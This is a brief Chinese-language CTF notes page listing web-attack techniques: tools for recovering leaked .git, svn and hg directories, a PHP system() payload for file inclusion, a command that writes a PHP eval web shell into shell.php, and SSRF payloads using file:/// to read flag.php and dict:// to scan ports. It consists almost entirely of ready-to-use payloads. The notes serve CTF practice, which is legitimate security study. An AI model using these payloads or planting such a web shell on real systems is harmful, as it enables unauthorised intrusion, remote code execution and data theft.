CTF笔记
#信息泄漏
目录遍历工具:disearch
.git文件恢复工具:GitHack
1 | git log |
svn泄漏/hg泄漏工具:dvcs-ripper
#文件包含
1 | <?php system('ls /');?> |
#命令执行
1 | echo "<?php @eval(\$_POST['a']);?>" >> shell.php |
#SSRF
#伪协议
1 | file:/// |
file:///var/www/html/flag.php //查看源代码
dict://127.0.0.1:$port$ //结合burp扫码端口